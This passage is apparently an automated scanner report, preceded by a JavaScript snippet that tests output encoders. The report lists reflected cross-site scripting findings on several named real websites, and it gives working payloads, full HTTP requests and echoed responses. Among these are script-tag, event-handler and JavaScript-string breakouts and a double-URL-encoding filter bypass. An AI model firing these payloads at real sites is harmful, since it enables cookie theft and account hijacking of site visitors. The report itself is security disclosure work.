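// The HTML tokeniser ends a <script> element at the first </script regardless
// of JavaScript string state; otherwise an unescaped " ends the string.
function breaksJsString(encoded) {
  if (/<\/script/i.test(encoded)) return true;
  let escaped = false;
  for (const ch of encoded) {
    if (escaped) { escaped = false; continue; }
    if (ch === '\\') { escaped = true; continue; }
    if (ch === '"') return true;
  }
  return false;
}

// The two templates the report's responses show, rendered safely.
function renderCanonical(url) {
  return '<link rel="canonical" href="' + encodeForHtml(url) + '" />';
}
function renderProp12(url) {
  return 's_265.prop12="' + encodeForJsString(url) + '";';
}

// What the JS engine recovers from the \uXXXX form (the value is unchanged).
function decodeJsString(encoded) {
  return JSON.parse('"' + encoded + '"');
}

function evaluate() {
  return {
    rawAttrBreaks:        breaksAttribute(PAYLOAD_ATTR),                         // true
    rawJsBreaks:          breaksJsString(PAYLOAD_JS),                            // true
    bracketsOnlyJsBreaks: breaksJsString(escapeAngleBracketsOnly(PAYLOAD_JS)),   // true
    backslashCloseBreaks: breaksJsString(backslashQuotesOnly(PAYLOAD_CLOSE)),    // true
    htmlEncodedAttrOk:    !breaksAttribute(encodeForHtml(PAYLOAD_ATTR)),         // true
    htmlEncodedTextOk:    !breaksText(encodeForHtml(PAYLOAD_TEXT)),              // true
    jsEncodedOk:          !breaksJsString(encodeForJsString(PAYLOAD_JS)) &&
                          !breaksJsString(encodeForJsString(PAYLOAD_CLOSE)),     // true
  };
}

console.log(evaluate());
```

The backslash-only encoder reproduces exactly what the blackvoices.com prop12 line shows, and it does stop the "-alert(1)-" payload; it does nothing against the </script><a> payload from issue 1.233, because the HTML tokeniser closes the script element before the JavaScript parser ever sees the string. Encoding to \uXXXX is the one form that is safe in the string and opaque to the HTML tokeniser at the same time, which is why the remediation text prefers not placing user data in script at all.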
1.252. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bloggingstocks.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f020e"-alert(1)-"014356e96ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?f020e"-alert(1)-"014356e96ab=1 HTTP/1.1 Host: www.bloggingstocks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.253. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bloggingstocks.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218f9"><script>alert(1)</script>7dcb406a603 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?218f9"><script>alert(1)</script>7dcb406a603=1 HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 898c0"><img%20src%3da%20onerror%3dalert(1)>608c32bafe0 was submitted in the REST URL parameter 2. This input was echoed as 898c0"><img src=a onerror=alert(1)>608c32bafe0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/stocks-to-buy898c0"><img%20src%3da%20onerror%3dalert(1)>608c32bafe0/ HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Stocks To Buy898c0\" ...[SNIP]... <meta name="description" content="Posts from the Stocks to buy898c0"><img src=a onerror=alert(1)>608c32bafe0 Category at BloggingStocks" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98487"-alert(1)-"2967d4b5373 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/stocks-to-buy98487"-alert(1)-"2967d4b5373/ HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Stocks To Buy98487\" ...[SNIP]...
1.256. http://www.bloggingstocks.com/category/stocks-to-buy/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bloggingstocks.com
Path: /category/stocks-to-buy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6441"><script>alert(1)</script>46a3decaefc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/stocks-to-buy/?c6441"><script>alert(1)</script>46a3decaefc=1 HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Stocks To Buy -- Blo ...[SNIP]... <link rel="canonical" href="http://www.bloggingstocks.com/category/stocks-to-buy/?c6441"><script>alert(1)</script>46a3decaefc=1"/> ...[SNIP]...
1.257. http://www.bloggingstocks.com/category/stocks-to-buy/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bloggingstocks.com
Path: /category/stocks-to-buy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2ac1"-alert(1)-"351873993a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/stocks-to-buy/?a2ac1"-alert(1)-"351873993a2=1 HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a596"><img%20src%3da%20onerror%3dalert(1)>458e833042a was submitted in the REST URL parameter 2. This input was echoed as 4a596"><img src=a onerror=alert(1)>458e833042a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/stocks-to-sell4a596"><img%20src%3da%20onerror%3dalert(1)>458e833042a/ HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Stocks To Sell4a596\ ...[SNIP]... <meta name="description" content="Posts from the Stocks to sell4a596"><img src=a onerror=alert(1)>458e833042a Category at BloggingStocks" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c328"-alert(1)-"236b3348c2b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/stocks-to-sell1c328"-alert(1)-"236b3348c2b/ HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Stocks To Sell1c328\ ...[SNIP]... s_265.linkInternalFilters="javascript:,bloggingstocks.com"; s_265.mmxgo = true; s_265.prop1="BloggingStocks"; s_265.prop2="Category"; s_265.prop12="http://www.bloggingstocks.com/category/stocks-to-sell1c328"-alert(1)-"236b3348c2b/"; s_265.prop16="Stocks To Sell1c328\\\" Alert(1) \\\"236b3348c2b -- BloggingStocks"; s_265.prop18="stocks-to-sell1c328\"-alert(1)-\"236b3348c2b"; s_265.prop19=""; s_265.prop20="";
var s_code=s_265.t ...[SNIP]...
1.260. http://www.bloggingstocks.com/category/stocks-to-sell/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bloggingstocks.com
Path: /category/stocks-to-sell/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e7b9"-alert(1)-"56855ea8d31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/stocks-to-sell/?5e7b9"-alert(1)-"56855ea8d31=1 HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Stocks To Sell -- Bl ...[SNIP]... 265.linkInternalFilters="javascript:,bloggingstocks.com"; s_265.mmxgo = true; s_265.prop1="BloggingStocks"; s_265.prop2="Category"; s_265.prop12="http://www.bloggingstocks.com/category/stocks-to-sell/?5e7b9"-alert(1)-"56855ea8d31=1"; s_265.prop16="Stocks To Sell -- BloggingStocks"; s_265.prop18="stocks-to-sell"; s_265.prop19=""; s_265.prop20="";
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.261. http://www.bloggingstocks.com/category/stocks-to-sell/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bloggingstocks.com
Path: /category/stocks-to-sell/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27143"><script>alert(1)</script>62c906a11a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/stocks-to-sell/?27143"><script>alert(1)</script>62c906a11a1=1 HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload db567<script>alert(1)</script>8ff1ceb380a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sub/__FEED__db567<script>alert(1)</script>8ff1ceb380a HTTP/1.1
Host: www.bloglines.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6779
Connection: close
Date: Sun, 06 Feb 2011 20:16:19 GMT
Server: lighttpd/1.4.26
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Bl ...[SNIP]... <p>Click here to subscribe to __FEED__db567<script>alert(1)</script>8ff1ceb380a</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload a75ea--><script>alert(1)</script>002cc05c041 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /sub/__FEED__a75ea--><script>alert(1)</script>002cc05c041 HTTP/1.1
Host: www.bloglines.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6788
Connection: close
Date: Sun, 06 Feb 2011 20:16:21 GMT
Server: lighttpd/1.4.26
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Bl ...[SNIP]... <input type="hidden" name="url" value="__FEED__a75ea--><script>alert(1)</script>002cc05c041" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c24e6"><script>alert(1)</script>05cab84ecba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sub/__FEED__c24e6"><script>alert(1)</script>05cab84ecba HTTP/1.1
Host: www.bloglines.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6785
Connection: close
Date: Sun, 06 Feb 2011 20:16:19 GMT
Server: lighttpd/1.4.26
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Bl ...[SNIP]... <form method="post" action="http://dashboard.bloglines.com/subscribe.php?url=__FEED__c24e6"><script>alert(1)</script>05cab84ecba"> ...[SNIP]...
1.265. http://www.bloglines.com/sub/__FEED__ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bloglines.com
Path: /sub/__FEED__
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 67a15<script>alert(1)</script>befbf2a3d6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sub/__FEED__?67a15<script>alert(1)</script>befbf2a3d6b=1 HTTP/1.1
Host: www.bloglines.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6788
Connection: close
Date: Sun, 06 Feb 2011 20:16:17 GMT
Server: lighttpd/1.4.26
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Bl ...[SNIP]... <p>Click here to subscribe to __FEED__?67a15<script>alert(1)</script>befbf2a3d6b=1</p> ...[SNIP]...
1.266. http://www.bloglines.com/sub/__FEED__ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bloglines.com
Path: /sub/__FEED__
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cadb6"><script>alert(1)</script>e4f23ab92f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sub/__FEED__?cadb6"><script>alert(1)</script>e4f23ab92f5=1 HTTP/1.1
Host: www.bloglines.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6794
Connection: close
Date: Sun, 06 Feb 2011 20:16:16 GMT
Server: lighttpd/1.4.26
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Bl ...[SNIP]... <form method="post" action="http://dashboard.bloglines.com/subscribe.php?url=__FEED__?cadb6"><script>alert(1)</script>e4f23ab92f5=1"> ...[SNIP]...
1.267. http://www.bloglines.com/sub/__FEED__ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bloglines.com
Path: /sub/__FEED__
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8e7a9--><script>alert(1)</script>d0fb6fba531 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /sub/__FEED__?8e7a9--><script>alert(1)</script>d0fb6fba531=1 HTTP/1.1
Host: www.bloglines.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6797
Connection: close
Date: Sun, 06 Feb 2011 20:16:18 GMT
Server: lighttpd/1.4.26
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Bl ...[SNIP]... <input type="hidden" name="url" value="__FEED__?8e7a9--><script>alert(1)</script>d0fb6fba531=1" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8ec2"><script>alert(1)</script>215fa641396 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www.citysbest.com/includea8ec2"><script>alert(1)</script>215fa641396/background.js?9 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK
Server: Apache/2.2
Content-Type: text/html
Expires: Sun, 06 Feb 2011 20:33:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:33:26 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 17210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <meta property="og:url" content="http://www.citysbest.com/includea8ec2"><script>alert(1)</script>215fa641396/background.js?9"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31a15%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3fdbd1e6334 was submitted in the REST URL parameter 2. This input was echoed as 31a15</script><script>alert(1)</script>3fdbd1e6334 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /www.citysbest.com/include31a15%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3fdbd1e6334/background.js?9 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK
Server: Apache/2.2
Content-Type: text/html
Expires: Sun, 06 Feb 2011 20:33:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:33:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 17540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... 5.pfxID="acg"; s_265.pageName=s_265.pfxID+" : "+pageName; s_265.channel="us.citybest"; s_265.linkInternalFilters="javascript:,citysbest.com";
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8778a"><script>alert(1)</script>7e8b93ad6cb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www.citysbest.com/include/background.js8778a"><script>alert(1)</script>7e8b93ad6cb?9 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK
Server: Apache/2.2
Content-Type: text/html
Expires: Sun, 06 Feb 2011 20:33:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:33:36 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16949
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <meta property="og:url" content="http://www.citysbest.com/include/background.js8778a"><script>alert(1)</script>7e8b93ad6cb?9"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17ac5%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2345f2523d8 was submitted in the REST URL parameter 3. This input was echoed as 17ac5</script><script>alert(1)</script>2345f2523d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /www.citysbest.com/include/background.js17ac5%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2345f2523d8?9 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK
Server: Apache/2.2
Content-Type: text/html
Expires: Sun, 06 Feb 2011 20:33:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:33:39 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 17166
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... "+pageName; s_265.channel="us.citybest"; s_265.linkInternalFilters="javascript:,citysbest.com";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de43a"><script>alert(1)</script>b3021176c3f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www.citysbest.com/includede43a"><script>alert(1)</script>b3021176c3f/citysbest-min.js?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK
Server: Apache/2.2
Content-Type: text/html
Expires: Sun, 06 Feb 2011 20:33:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:33:26 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 17226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <meta property="og:url" content="http://www.citysbest.com/includede43a"><script>alert(1)</script>b3021176c3f/citysbest-min.js?29"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53e47%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021195fdc5c was submitted in the REST URL parameter 2. This input was echoed as 53e47</script><script>alert(1)</script>021195fdc5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /www.citysbest.com/include53e47%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021195fdc5c/citysbest-min.js?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
